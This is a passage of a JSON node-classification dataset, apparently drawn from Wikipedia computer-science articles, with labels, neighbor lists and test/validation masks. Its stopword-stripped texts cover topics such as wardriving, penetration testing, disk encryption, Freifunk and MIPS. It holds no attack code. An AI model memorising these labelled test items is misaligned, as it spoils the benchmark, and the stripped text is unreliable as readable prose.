      5019,
      5659,
      669,
      8472,
      11545,
      4003,
      4132,
      6310,
      167,
      40,
      3626,
      5290,
      10410,
      9262,
      10802,
      821,
      5175,
      7866,
      1083,
      1728,
      7617,
      4291,
      7877,
      10053,
      199,
      967,
      9292,
      7246,
      1615,
      4305,
      5201,
      6996,
      7253,
      854,
      6870,
      10583,
      5211,
      6748,
      737,
      1633,
      9443,
      3300,
      4324,
      7399,
      8423,
      6505,
      10599,
      109,
      5998,
      7151,
      8433,
      1533
    ],
    "mask": "Test"
  },
  {
    "node_id": 7221,
    "label": 4,
    "text": "Call_screening:call screening call screening process evaluating characteristics telephone call deciding whether answer methods may include addition us canada call screen name calling feature offered telephone companies allows customer establish list numbers anyone calling customer numbers receive automatic message indicating call accepted another name usually used marketing purposes selective call rejection also devices telezapper screening telephone calls",
    "neighbors": [
      11170
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7222,
    "label": 4,
    "text": "Wardriving:wardriving wardriving act searching wi-fi wireless networks person usually moving vehicle using laptop smartphone software wardriving freely available internet warbiking warcycling similar wardriving done moving bicycle motorcycle practice sometimes facilitated mounting wi-fi enabled device vehicle warwalking warjogging similar wardriving done foot rather moving vehicle warrailing wartraining similar wardriving done trains tram buses means public transport wardroning accomplished drone war driving originated wardialing method popularized character played matthew broderick film wargames named film war dialing consists dialing every phone number specific sequence search modems warbiking warcycling similar wardriving done moving bicycle motorcycle practice sometimes facilitated mounting wi-fi enabled device vehicle warwalking warjogging similar wardriving done foot rather moving vehicle disadvantages method slower speed travel leading discovery infrequently discovered networks absence convenient computing environment consequently handheld devices pocket computers perform tasks users walking standing dominated practice technology advances developments early 2000s expanded extent practice advances include computers integrated wi-fi rather compactflash cf pc card pcmcia add-in cards computers dell axim compaq ipaq toshiba pocket computers starting 2002 recently active nintendo ds sony psp enthusiast communities gained wi-fi abilities devices many newer smartphones integrate wi-fi global positioning system gps warrailing wartraining similar wardriving done train tram rather slower controllable vehicle disadvantages method higher speed travel resulting less discovery infrequently discovered networks often limited major roads higher traffic warkitting combination wardriving rootkitting warkitting attack hacker replaces firmware attacked router allows control traffic victim could even permit disable tls replacing html content downloaded warkitting identified tsow jakobsson yang wardrivers use wifi-equipped device together gps device record location wireless networks results uploaded websites like wigle openbmap geomena data processed form maps network neighborhood also clients available smartphones running android upload data directly better range sensitivity antennas built bought vary omnidirectional highly directional maps known network ids used geolocation system—an alternative gps—by triangulating current position signal strengths known network ids examples include place lab intel skyhook navizon cyril houri seekerlocate seeker wireless openbmap geomena navizon openbmap combines information wi-fi cell phone tower maps contributed users wi-fi-equipped cell phones addition location finding provides navigation information allows tracking position friends geotagging december 2004 class 100 undergraduates worked map city seattle washington several weeks found 5,225 access points 44 secured wep encryption 52 open 3 pay-for-access noticed trends frequency security networks depending location many open networks clearly intended used general public network names like open share porn please free access nice information collected high-resolution maps published online previous efforts mapped cities dublin portray wardriving questionable practice typically association piggybacking though technical viewpoint everything working designed many access points broadcast identifying data accessible anyone suitable receiver could compared making map neighborhood house numbers mail box labels may claim wardriving illegal laws specifically prohibit allow wardriving though many localities laws forbidding unauthorized access computer networks protecting personal privacy google created privacy storm countries eventually admitted systematically surreptitiously gathering wifi data capturing video footage mapping data street view service since using android-based mobile devices gather data passive listen-only wardriving programs like kismet kismac communicate networks merely logging broadcast addresses likened listening radio station happens broadcasting area forms dxing types software netstumbler wardriver actively sends probe messages access point responds per design legality active wardriving less certain since wardriver temporarily becomes associated network even though data transferred access points using default box security settings intended provide wireless access request war driver liability may reduced setting computer static ip instead using dhcp preventing network granting computer ip address logging connection united states case usually referenced determining whether network accessed state v. allen case allen wardialing attempt get free long distance calling southwestern bell computer systems presented password protection screen however attempt bypass court ruled although contacted approached computer system constitute access company network also homebrew wardriving applications handheld game consoles support wi-fi sniff jazzbox/wardive nintendo ds/android road dog sony psp wifi-where iphone g-mon wardrive wigle wifi android wlanpollution symbian nokias60 devices also exists mode within sony psp wherein player able find new comrades searching wireless access points used wardrive treasure world ds commercial game gameplay wholly revolves around wardriving",
    "neighbors": [
      9732,
      7449,
      794,
      11165,
      9886,
      9256,
      5427,
      6712,
      1083,
      61,
      11198,
      9791,
      11341,
      4435,
      10329,
      8922,
      1625,
      1758,
      6375,
      10346,
      2430
    ],
    "mask": "Test"
  },
  {
    "node_id": 7223,
    "label": 5,
    "text": "Transport_Sample_Protocol:transport sample protocol transport sample protocol tsp open source network protocol sampling data based tcp/ip allows synchronous asynchronous sample delivery implementations linux windows solaris osf1 vxworks c java released gnu lesser general public license lgpl tsp developed use satellite validation benches",
    "neighbors": [
      3969,
      546,
      10851,
      9320,
      1101,
      5677,
      6797,
      2864,
      8909,
      8147,
      823,
      10971,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7224,
    "label": 2,
    "text": "MNOS_(operating_system):mnos operating system mnos meaning mobilnaya operatsionnaya sistema мобильная операционная система мнос portable operating system unix-like operating system developed soviet union system derived version 6 unix consequently heavily modified incorporate many features bsd unix 1983 1986 enjoyed significant popularity ussr eastern bloc countries due light weight better performance version 7 unix later bsd unix-based alternatives development initiated ipk minavtoproma moscow 1981 development continued cooperation institutes including kurchatov institute mnos alternative demos version 1.x gradually merged 1986 1990 resulting joint os demos version 2.x mnos became first completely bilingual version unix used proprietary 8-bit cyrillic character set u-code later dropped favor koi-8 process merging demos origin version qualifier rl rabochaya loshadka working horsy",
    "neighbors": [
      6787,
      8713,
      11145,
      6412,
      7823,
      5267,
      5397,
      1304,
      3487,
      3488,
      3241,
      10156,
      7983,
      3248,
      2995,
      9141,
      823,
      9784,
      3129,
      1853,
      9151,
      10436,
      4039,
      6369,
      9444,
      4076,
      5492,
      2424,
      633
    ],
    "mask": "Test"
  },
  {
    "node_id": 7225,
    "label": 6,
    "text": "TiVo_Media_File_System:tivo media file system mfs media file system proprietary file system used tivo hard drives fault tolerant real-time recording live tv although mfs still particularly well understood programmers unaffiliated tivo corporation enough known file system able reads limited writes applications exist manipulate file system objects within applications reverse engineered software found tivo many early tivo programs little specialized scripts manipulated data mfs file system organized like database including transaction logging rollback capabilities utilizes multiple partitions drive complete system partitions come pairs one application partition media partition media region invariably quite large organized long continuous blocks data variable block size minimum least 1 megabyte designed store large sections video object tivo file system assigned id internally called fsid presumably file system id least 4 types objects mfs supports streams recordings audio video directory database files stream objects stored mfs media regions types stored application regions file system implemented entirely linux userspace primary reason tivo devised system needed way store large continuous sections data easily manner lent well streaming data directly media decoders tivo devices without cpu dependent thus cpu little involvement playback recording functionality simply directing encoder/decoder chips stream data directly drives via direct memory access mapping sections virtual memory onto drive main cpu orchestrates entire affair result data stored mfs media region formatted normal files direct data stream indexed database sections mfs application region",
    "neighbors": [
      5120,
      6669,
      3598,
      10257,
      6677,
      5142,
      8214,
      9762,
      5158,
      11323,
      8772,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      7344,
      2230,
      5816,
      1212,
      8380,
      10951,
      9420,
      3795,
      4819,
      8404,
      728,
      8410,
      6365,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      2314,
      8461,
      6416,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      9004,
      302,
      6961,
      3909,
      2378,
      4431,
      346,
      2395,
      2397,
      10596,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      11675,
      414,
      2974,
      7070,
      4012,
      1454,
      6062,
      8114,
      7603,
      1464,
      1978,
      8643,
      7126,
      1509,
      9189,
      11256,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 7226,
    "label": 1,
    "text": "Common_Database_on_Designated_Areas:common database designated areas common database designated areas cdda data bank officially designated protected areas nature reserves protected landscapes national parks etc europe data bank went live 1999 community project european environment agency eea council europe united nations environment programme world conservation monitoring centre unep-wcmc data bank divided national area international area national area member states eu eea european environment information observation network eionet data cleansing national area non-eea members international area carried unep-wcmc systems data bank follows system international union conservation nature natural resources iucn standards united nations order ensure compatibility similar data banks worldwide especially world database protected areas wdpa data bank accessed internet using website european nature information system eunis date true marine protected areas marine protected areas atlantic arc maia included data bank pursued",
    "neighbors": [
      2794
    ],
    "mask": "Test"
  },
  {
    "node_id": 7227,
    "label": 4,
    "text": "United_States_v._Solon:united states v. solon united states v. solon 596 f.3d 1206 10th cir 2010 case nathaniel solon casper citizen convicted possession child pornography case became known media irregularities process suspicions affirmed defendant material introduced malware computer people accused similar crimes later acquitted solon never exonerated nathaniel solon charged january 18 2007 indictment possessing child pornography october 2 2007 pleaded guilty came back another hearing january 8 2008 however solon stated innocent man reason pleaded guilty first place believed financial resources hire expert witness investigate defense regard explanation court appointed private attorney represent court approval solon able request expert witness investigation budget 20,000 supplied court",
    "neighbors": [
      7515,
      7227
    ],
    "mask": "None"
  },
  {
    "node_id": 7228,
    "label": 4,
    "text": "Penetration_test:penetration test penetration test colloquially known pen test pentest ethical hacking authorized simulated cyberattack computer system performed evaluate security system test performed identify weaknesses also referred vulnerabilities including potential unauthorized parties gain access system features data well strengths enabling full risk assessment completed process typically identifies target systems particular goal reviews available information undertakes various means attain goal penetration test target may white box provides background system information black box provides basic information except company name gray box penetration test combination two limited knowledge target shared auditor penetration test help determine whether system vulnerable attack defenses sufficient defenses test defeated security issues penetration test uncovers reported system owner penetration test reports may also assess potential impacts organization suggest countermeasures reduce risk national cyber security center describes penetration testing following method gaining assurance security system attempting breach system security using tools techniques adversary might goals penetration test vary depending type approved activity given engagement primary goal focused finding vulnerabilities could exploited nefarious actor informing client vulnerabilities along recommended mitigation strategies penetration tests component full security audit example payment card industry data security standard requires penetration testing regular schedule system changes flaw hypothesis methodology systems analysis penetration prediction technique list hypothesized flaws software system compiled analysis specifications documentation system list hypothesized flaws prioritized basis estimated probability flaw actually exists ease exploiting extent control compromise prioritized list used direct actual testing system mid 1960s growing popularity time-sharing computer systems made resources accessible communications lines created new security concerns scholars deborah russell g. t. gangemi sr. explain 1960s marked true beginning age computer security june 1965 example several country leading computer security experts held one first major conferences system security—hosted government contractor system development corporation sdc conference someone noted one sdc employee able easily undermine various system safeguards added sdc an/fsq-32 time-sharing computer system hopes system security study would useful attendees requested ... studies conducted areas breaking security protection time-shared system words conference participants initiated one first formal requests use computer penetration tool studying system security spring 1967 joint computer conference many leading computer specialists met discuss system security concerns conference computer security experts willis ware harold petersen rein tern rand corporation bernard peters national security agency nsa used phrase penetration describe attack computer system paper ware referred military remotely accessible time-sharing systems warning deliberate attempts penetrate computer systems must anticipated colleagues petersen turn shared concerns observing online communication systems ... vulnerable threats privacy including deliberate penetration bernard peters nsa made point insisting computer input output ... could provide large amounts information penetrating program conference computer penetration would become formally identified major threat online computer systems threat computer penetration posed next outlined major report organized united states department defense dod late 1967 essentially dod officials turned willis ware lead task force experts nsa cia dod academia industry formally assess security time-sharing computer systems relying many papers presented spring 1967 joint computer conference task force largely confirmed threat system security computer penetration posed ware report initially classified many country leading computer experts quickly identified study definitive document computer security jeffrey r. yost charles babbage institute recently described ware report ... far important thorough study technical operational issues regarding secure computing systems time period effect ware report reaffirmed major threat posed computer penetration new online time-sharing computer systems better understand system weaknesses federal government contractors soon began organizing teams penetrators known tiger teams use computer penetration test system security deborah russell g. t. gangemi sr. stated 1970s ... 'tiger teams first emerged computer scene tiger teams government industry-sponsored teams crackers attempted break defenses computer systems effort uncover eventually patch security holes leading scholar history computer security donald mackenzie similarly points rand done penetration studies experiments circumventing computer security controls early time-sharing systems behalf government jeffrey r. yost charles babbage institute work history computer security also acknowledges rand corporation sdc engaged first so-called 'penetration studies try infiltrate time-sharing systems order test vulnerability virtually early studies tiger teams successfully broke targeted computer systems country time-sharing systems poor defenses early tiger team actions efforts rand corporation demonstrated usefulness penetration tool assessing system security time one rand analyst noted tests ... demonstrated practicality system-penetration tool evaluating effectiveness adequacy implemented data security safeguards addition number rand analysts insisted penetration test exercises offered several benefits justified continued use noted one paper penetrator seems develop diabolical frame mind search operating system weaknesses incompleteness difficult emulate reasons others many analysts rand recommended continued study penetration techniques usefulness assessing system security perhaps leading computer penetration expert formative years james p. anderson worked nsa rand government agencies study system security early 1971 u.s. air force contracted anderson private company study security time-sharing system pentagon study anderson outlined number major factors involved computer penetration anderson described general attack sequence steps time anderson description general computer penetration steps helped guide many security experts relied technique assess time-sharing computer system security following years computer penetration tool security assessment became refined sophisticated early 1980s journalist william broad briefly summarized ongoing efforts tiger teams assess system security broad reported dod-sponsored report willis ware ... showed spies could actively penetrate computers steal copy electronic files subvert devices normally guard top-secret information study touched decade quiet activity elite groups computer scientists working government tried break sensitive computers succeeded every attempt various studies may suggested computer security u.s. remained major problem scholar edward hunt recently made broader point extensive study computer penetration security tool hunt suggests recent paper history penetration testing defense establishment ultimately ... created many tools used modern day cyberwarfare carefully defined researched many ways computer penetrators could hack targeted systems wide variety security assessment tools available assist penetration testing including free-of-charge free software commercial software several operating system distributions geared towards penetration testing distributions typically contain pre-packaged pre-configured set tools penetration tester hunt individual tool might increase risk complications—such compile errors dependency issues configuration errors also acquiring additional tools may practical tester context notable penetration testing os examples include many specialized operating systems facilitate penetration testing—each less dedicated specific field penetration testing number linux distributions include known os application vulnerabilities deployed targets practice systems help new security professionals try latest security tools lab environment examples include damn vulnerable linux dvl owasp web testing environment wtw metasploitable process penetration testing may simplified five phases attacker exploited one vulnerability may gain access machines process repeats i.e look new vulnerabilities attempt exploit process referred pivoting legal operations let tester execute illegal operation include unescaped sql commands unchanged hashed passwords source-visible projects human relationships old hashing cryptographic functions single flaw may enough enable critically serious exploit leveraging multiple known flaws shaping payload way appears valid operation almost always required metasploit provides ruby library common tasks maintains database known exploits budget time constraints fuzzing common technique discovers vulnerabilities aims get unhandled error random input tester uses random input access less often used code paths well-trodden code paths usually free errors errors useful either expose information http server crashes full info trace-backs—or directly usable buffer overflows imagine website 100 text input boxes vulnerable sql injections certain strings submitting random strings boxes hopefully hits bugged code path error shows broken html page half rendered sql error case text boxes treated input streams however software systems many possible input streams cookie session data uploaded file stream rpc channels memory errors happen input streams test goal first get unhandled error understand flaw based failed test case testers write automated tool test understanding flaw correct may become obvious package payload target system triggers execution viable one hope another error produced fuzzer yields fruit use fuzzer saves time checking adequate code paths exploits unlikely illegal operation payload metasploit terminology include functions logging keystrokes taking screenshots installing adware stealing credentials creating backdoors using shellcode altering data companies maintain large databases known exploits provide products automatically test target systems vulnerabilities general services administration gsa standardized penetration test service pre-vetted support service rapidly address potential vulnerabilities stop adversaries impact us federal state local governments services commonly referred highly adaptive cybersecurity services hacs listed us gsa advantage website effort identified key service providers technically reviewed vetted provide advanced penetration services gsa service intended improve rapid ordering deployment services reduce us government contract duplication protect support us infrastructure timely efficient manner 132-45a penetration testing security testing service assessors mimic real-world attacks identify methods circumventing security features application system network hacs penetration testing services typically strategically test effectiveness organization preventive detective security measures employed protect assets data part service certified ethical hackers typically conduct simulated attack system systems applications another target environment searching security weaknesses testing typically document vulnerabilities outline defenses effective defeated exploited also typically provide recommended remediation plans address weaknesses discovered uk penetration testing services standardized via professional bodies working collaboration national cyber security centre",
    "neighbors": [
      5636,
      6665,
      8462,
      3473,
      3604,
      1429,
      4373,
      1689,
      5924,
      7717,
      10149,
      3111,
      3887,
      3503,
      11567,
      2739,
      7989,
      823,
      8119,
      8637,
      11198,
      2430,
      11075,
      10437,
      4552,
      6473,
      11213,
      7887,
      1232,
      4689,
      4945,
      10196,
      2262,
      9815,
      9688,
      9049,
      4956,
      9693,
      3552,
      612,
      4580,
      7526,
      877,
      3310,
      2671,
      5870,
      8047,
      4471,
      1912,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 7229,
    "label": 6,
    "text": "Disk_encryption_theory:disk encryption theory disk encryption special case data rest protection storage medium sector-addressable device e.g. hard disk article presents cryptographic aspects problem discussion different software packages hardware devices devoted problem see disk encryption software disk encryption hardware disk encryption methods aim provide three distinct properties first property requires defining adversary data kept confidential strongest adversaries studied field disk encryption abilities method provides good confidentiality information adversary determine time whether data sector changed since last time looked second property requires dividing disk several sectors usually 512 bytes bits long encrypted decrypted independently turn data stay confidential encryption method must tweakable two sectors processed exactly way otherwise adversary could decrypt sector disk copying unused sector disk requesting decryption third property generally non-controversial however indirectly prohibits use stream ciphers since stream ciphers require security initial state used twice would case sector updated different data thus would require encryption method store separate initial states every sector disk—seemingly waste space alternative block cipher limited certain block size usually 128 256 bits disk encryption chiefly studies chaining modes expand encryption block length cover whole disk sector considerations already listed make several well-known chaining modes unsuitable ecb mode tweaked modes turn block ciphers stream ciphers ctr mode three properties provide assurance disk integrity n't tell whether adversary modifying ciphertext part absolute assurance disk integrity impossible matter adversary could always revert entire disk prior state circumventing checks non-absolute level disk integrity desired achieved within encrypted disk file-by-file basis using message authentication codes like encryption schemes block cipher-based disk encryption makes use modes operation allow encrypting larger amounts data ciphers block-size typically 128 bits modes therefore rules repeatedly apply ciphers single-block operations cipher-block chaining cbc common chaining mode previous block ciphertext xored current block plaintext encryption since n't previous block ciphertext first block initialization vector iv must used formula_2 turn makes cbc tweakable ways cbc suffers problems example ivs predictable adversary may leave watermark disk i.e. store specially created file combination files identifiable even encryption exact method constructing watermark depends exact function providing ivs general recipe create two encrypted sectors identical first blocks formula_3 formula_4 two related formula_5 thus encryption formula_6 identical encryption formula_7 leaving watermark disk exact pattern same-different-same-different disk altered make watermark unique given file protect watermarking attack cipher hash function used generate ivs key current sector number adversary predict ivs particular essiv approach uses block cipher ctr mode generate ivs essiv method generating initialization vectors block encryption use disk encryption usual methods generating ivs predictable sequences numbers based example time stamp sector number prevents certain attacks watermarking attack essiv prevents attacks generating ivs combination sector number sn hash key combination key form hash makes iv unpredictable essiv designed clemens fruhwirth integrated linux kernel since version 2.6.10 though similar scheme used generate ivs openbsd swap encryption since 2000 essiv supported option dm-crypt freeotfe disk encryption systems cbc without essiv ensures confidentiality ensure integrity encrypted data plaintext known adversary possible change every second plaintext block value chosen attacker blocks changed random values used practical attacks disk encryption cbc cbc-essiv mode order prevent elaborate attacks different modes operation introduced tweakable narrow-block encryption lrw xex wide-block encryption cmc eme whereas purpose usual block cipher formula_9 mimic random permutation secret key formula_10 purpose tweakable encryption formula_11is mimic random permutation secret key formula_10 known tweak formula_13 tweakable narrow-block encryption lrw instantiation mode operations introduced liskov rivest wagner see theorem 2 mode uses two keys formula_10 key block cipher formula_15 additional key size block example aes 256-bit key formula_10 256-bit number formula_15 128-bit number encrypting block formula_18 logical index tweak formula_19 uses following formula multiplication formula_21 addition formula_22 performed finite field formula_23 aes precomputation single multiplication per sector required note addition binary finite field simple bitwise addition also known xor formula_24 formula_25 precomputed possible values formula_26 mode operation needs single encryption per block protects attacks except minor leak user changes single plaintext block sector single ciphertext block changes note leak ecb mode lrw mode equal plaintexts different positions encrypted different ciphertexts security concerns exist lrw mode operation replaced xts lrw employed bestcrypt supported option dm-crypt freeotfe disk encryption systems another tweakable encryption mode xex xor–encrypt–xor designed rogaway allow efficient processing consecutive blocks respect cipher used within one data unit e.g. disk sector tweak represented combination sector address index block within sector original xex mode proposed rogaway allows several indices ciphertext formula_27 obtained using basic operations lrw mode aes cipher galois field multiplication ones used galois/counter mode gcm thus permitting compact implementation universal lrw/xex/gcm hardware ciphertext stealing provides support sectors size divisible block size example 520-byte sectors 16-byte blocks xts-aes standardized 2007-12-19 ieee p1619 standard supports using different key iv encryption block encryption contrary intent xex seems rooted misinterpretation original xex paper harm security result users wanting aes-256 aes-128 encryption must supply 512 bits 256 bits key respectively january 27 2010 nist released special publication sp 800-38e final form sp 800-38e recommendation xts-aes mode operation standardized ieee std 1619-2007 cryptographic modules publication approves xts-aes mode aes algorithm reference ieee std 1619-2007 subject one additional requirement limits maximum size encrypted data unit typically sector disk block formula_35 aes blocks according sp 800-38e absence authentication access control xts-aes provides protection approved confidentiality-only modes unauthorized manipulation encrypted data xts supported bestcrypt botan netbsd cgd dm-crypt freeotfe truecrypt veracrypt diskcryptor freebsd geli openbsd softraid disk encryption software openssl mac os x lion filevault 2 windows 10 bitlocker wolfcrypt xts mode susceptible data manipulation tampering applications must employ measures detect modifications data manipulation tampering concern ... since authentication tags ciphertext original modified attacker decrypted plaintext built-in mechanism detect alterations best done ensure alteration ciphertext completely randomize plaintext rely application uses transform include sufficient redundancy plaintext detect discard random plaintexts would require maintaining checksums data metadata disk done zfs btrfs however commonly used file systems ext4 ntfs metadata protected tampering detection data tampering non-existent mode susceptible traffic analysis replay randomization attacks sectors 16-byte blocks given sector rewritten attackers collect fine-grained 16 byte ciphertexts used analysis replay attacks 16-byte granularity would possible define sector-wide block ciphers unfortunately degraded performance see cmc eme protect even minor leak mentioned lrw unfortunately price twofold degradation performance block must encrypted twice many consider high cost since leak sector level unavoidable anyway cmc introduced halevi rogaway stands cbc–mask–cbc whole sector encrypted cbc mode formula_36 ciphertext masked xoring formula_37 re-encrypted cbc mode starting last block underlying block cipher strong pseudorandom permutation prp sector level scheme tweakable prp one problem order decrypt formula_38 one must sequentially pass data twice order solve problem halevi rogaway introduced parallelizable variant called eme ecb–mask–ecb works following way note unlike lrw cmc single key formula_10 cmc eme considered standardization siswg eme patented favored primary supported mode authenticated encryption scheme iapm provides encryption well authentication tag encryption component iapm mode completely describes lrw xex schemes hence xts without ciphertext stealing aspect described detail figures 8 5 us patent 6,963,976",
    "neighbors": [
      672,
      8772,
      9343,
      2919,
      5391,
      5552,
      2193,
      434,
      3315,
      3572,
      7794,
      246,
      3382,
      5983,
      6265,
      7229,
      6494,
      895
    ],
    "mask": "None"
  },
  {
    "node_id": 7230,
    "label": 0,
    "text": "Magnus_Sahlgren:magnus sahlgren magnus sahlgren born january 1 1973 swedish computational linguist guitarist magnus sahlgren known work random indexing applied distributional semantics published research projects swedish institute computer science later gavagai ab research company co-founded 2008 sahlgren dissertation word-space model awarded prize prominent scholarly achievement 2006 stockholm university faculty humanities sahlgren lead guitarist metal band lake tears name associated 2009 also played dismember 1998 2003 tiamat recording acclaimed wildhoney album 1994 helped band achieve technical proficiency helping songwriting solos session artist 2004 accepted full-time member lake tears since influences even visible notably album moons mushrooms performs solos every track",
    "neighbors": [
      1890,
      9935
    ],
    "mask": "None"
  },
  {
    "node_id": 7231,
    "label": 4,
    "text": "Validation_authority:validation authority public key infrastructure validation authority va entity provides service used verify validity digital certificate per mechanisms described x.509 standard page 69 dominant method used purpose host certificate revocation list download via http ldap protocols reduce amount network traffic required certificate validation ocsp protocol may used instead validation authority capable responding network-based request crl lacks ability issue revoke certificates must continuously updated current crl information certificate authority issued certificates contained within crl potentially labor-intensive process use dedicated validation authority allows dynamic validation certificates issued offline root certificate authority root ca unavailable network traffic certificates issued always verified via validation authority protocols mentioned ongoing administrative overhead maintaining crls hosted validation authority typically minimal uncommon root cas issue revoke large numbers certificates",
    "neighbors": [
      513,
      517,
      1288,
      1836,
      10831,
      9744,
      8859,
      6651,
      4380,
      4797
    ],
    "mask": "Test"
  },
  {
    "node_id": 7232,
    "label": 7,
    "text": "Freifunk:freifunk freifunk german free radio non-commercial open grassroots initiative support free computer networks german region freifunk part international movement wireless community network initiative counts 400 local communities 41,000 access points among münster aachen munich stuttgart paderborn biggest communities 1000 access points main goals freifunk build large scale free wireless wi-fi network decentralized owned run support local communication initiative based picopeering agreement agreement participants agree upon network free discrimination sense net neutrality similar grassroots initiatives austria switzerland funkfeuer openwireless like many free community-driven networks freifunk uses mesh technology bring ad hoc networks interconnecting multiple wireless lans wi-fi mobile ad hoc network routers connect using special routing software router fails software automatically calculates new route destination software freifunk firmware based openwrt free software several different implementations firmware depending hardware protocols local communities use first wi-fi ad hoc network done georgia usa 1999 demonstrated toh.it six-node implementation running associativity-based routing protocol linux kernel wavelan wifi abr patented protocol following experience freifunk work standard ietf protocols two common standard proposals olsr b.a.t.m.a.n development b.a.t.m.a.n driven freifunk activists volunteering basis one results berlon workshop october 2002 free wireless community networks berlin london picopeering agreement agreement rationales free networks describes transmission people data handled free network become core agreement community workshop participants also agreed upon regular meetings berlin build free wifi network ever since weekly meetings c-base hackerspace every wednesday time german language site freifunk.net started september 2003 freifunk activists founded non-profit association förderverein freie netzwerke e.v support free communication infrastructures following years initiative became quite successful germany also became easier install freifunk firmware off-the-shelf wireless routers yearly wireless community weekend taking place berlin c-base 2012 berlin freifunk community got lot media attention project called freifunk freedom fighter box project fights secondary liability secondary liability legal situation makes owners open non-encrypted wireless access points liable users internet connection outlined störerhaftung law owners thus forced pay copyright infringements third persons opened network public legal practice led fear uncertainty made many people close access points e.g cafés public locations freifunk freedom fighter box preconfigured access point sent data public network sweden vpn connection sweden countries secondary liability 2013 hamburg freifunk community set network 300 nodes using vpn tunnels netherlands many new freifunk communities emerged berlin community building backbone network based microwave transmission longer distances project funded local broadcasting corporation medienanstalt berlin-brandenburg still on-going germany",
    "neighbors": [
      3016,
      5978,
      2829,
      9098
    ],
    "mask": "Test"
  },
  {
    "node_id": 7233,
    "label": 1,
    "text": "Apache_Kylin:apache kylin apache kylin open source distributed analytics engine designed provide sql interface multi-dimensional analysis olap hadoop alluxio supporting extremely large datasets originally developed ebay project apache software foundation kylin project started 2013 ebay r shanghai china oct 2014 kylin v0.6 open sourced github.com name kylinolap nov 2014 kylin joined apache software foundation incubator december 2015 apache kylin graduated top level project kyligence inc chinese company provides commercial support apache kylin consists primarily original developers open source code apache kylin built top apache hadoop apache hive apache hbase apache calcite apache spark technologies technologies powerful matured making kylin able support massive data load easily scale kylin following core components apache kylin adopted many companies olap platform production typical users includes ebay meituan xiaomi netease beike yahoo japan apache kylin roadmap kylin website",
    "neighbors": [
      10377,
      8460,
      7567,
      1296,
      6161,
      1047,
      8217,
      11161,
      6555,
      8860,
      3877,
      10661,
      11303,
      5677,
      10413,
      1327,
      4919,
      5047,
      4538,
      1851,
      6074,
      7485,
      7742,
      9789,
      6338,
      4419,
      1222,
      1991,
      4294,
      7750,
      5066,
      8139,
      4944,
      1363,
      8408,
      9179,
      7261,
      990,
      8799,
      10719,
      865,
      11235,
      8294,
      11111,
      8425,
      8810,
      747,
      2163,
      6774,
      7159,
      1913,
      1018
    ],
    "mask": "Test"
  },
  {
    "node_id": 7234,
    "label": 3,
    "text": "MIPS_architecture:mips architecture mips microprocessor without interlocked pipelined stages reduced instruction set computer risc instruction set architecture isa developed mips computer systems mips technologies based united states multiple versions mips including mips ii iii iv v well five releases mips32/64 32- 64-bit implementations respectively early mips architectures 32-bit 64-bit versions developed later april 2017 current version mips mips32/64 release 6 mips32/64 primarily differs mips i–v defining privileged kernel mode system control coprocessor addition user mode architecture computer architecture courses universities technical schools often study mips architecture architecture greatly influenced later risc architectures alpha april 2017 mips processors used embedded systems residential gateways routers originally mips designed general-purpose computing 1980s 1990s mips processors personal workstation server computers used many companies digital equipment corporation mips computer systems nec pyramid technology sicortex siemens nixdorf silicon graphics tandem computers historically video game consoles nintendo 64 sony playstation playstation 2 playstation portable used mips processors mips processors also used popular supercomputers 1990s systems dropped top500 list uses complemented embedded applications first 1990s mips became major presence embedded processor market 2000s mips processors applications mid- late-1990s estimated one three risc microprocessors produced mips processor mips modular architecture supporting four coprocessors cp0/1/2/3 mips terminology cp0 system control coprocessor essential part processor implementation-defined mips i–v cp1 optional floating-point unit fpu cp2/3 optional implementation-defined coprocessors mips iii removed cp3 reused opcodes purposes example playstation video game console cp2 geometry transformation engine gte accelerates processing geometry 3d computer graphics mips architecture several optional extensions mips-3d simple set floating-point simd instructions dedicated common 3d tasks mdmx madmax extensive integer simd instruction set using 64-bit floating-point registers mips16e adds compression instruction stream make programs take less room mips mt adds multithreading capability december 2018 wave computing new owner mips architecture see mips technologies announced mips isa open-sourced program dubbed mips open initiative program planned 2019 intended open access recent versions 32-bit 64-bit designs making available without licensing royalty fees well granting participants licenses existing mips patents first version mips architecture designed mips computer systems r2000 microprocessor first mips implementation mips r2000 introduced together 1985 mips ii introduced mips renamed mips distinguish new version mips load/store architecture also known register-register architecture except load/store instructions used access memory instructions operate registers mips thirty-two 32-bit general-purpose registers gpr register 0 hardwired zero writes discarded register 31 link register integer multiplication division instructions run asynchronously instructions pair 32-bit registers hi lo provided small set instructions copying data general-purpose registers hi/lo registers program counter 32 bits two low-order bits always contain zero since mips instructions 32 bits long aligned natural word boundaries instructions divided three types r j every instruction starts 6-bit opcode addition opcode r-type instructions specify three registers shift amount field function field i-type instructions specify two registers 16-bit immediate value j-type instructions follow opcode 26-bit jump target following three formats used core instruction set mips instructions load store 8-bit bytes 16-bit halfwords 32-bit words one addressing mode supported base displacement since mips 32-bit architecture loading quantities fewer 32 bits requires datum either signed- zero-extended 32 bits load instructions suffixed unsigned perform zero extension otherwise sign extension performed load instructions source base contents gpr rs write result another gpr rt store instructions source base contents gpr rs store data another gpr rt load store instructions compute memory address summing base sign-extended 16-bit immediate mips requires memory accesses aligned natural word boundaries otherwise exception signaled support efficient unaligned memory accesses load/store word instructions suffixed left right load instructions followed load delay slot instruction load delay slot use data loaded load instruction load delay slot filled instruction dependent load nop substituted instruction found mips instructions perform addition subtraction instructions source operands two gprs rs rt write result third gpr rd alternatively addition source one operands 16-bit immediate sign-extended 32 bits instructions addition subtraction two variants default exception signaled result overflows instructions unsigned suffix signal exception overflow check interprets result 32-bit two complement integer mips instructions perform bitwise logical xor instructions source operands two gprs write result third gpr xor instructions alternatively source one operands 16-bit immediate zero-extended 32 bits set relation instructions write one zero destination register specified relation true false instructions source operands two gprs one gpr 16-bit immediate sign-extended 32 bits write result third gpr default operands interpreted signed integers variants instructions suffixed unsigned interpret operands unsigned integers even source operand sign-extended 16-bit immediate load immediate upper instruction copies 16-bit immediate high-order 16 bits gpr used conjunction immediate instruction load 32-bit immediate register mips instructions perform left right logical shifts right 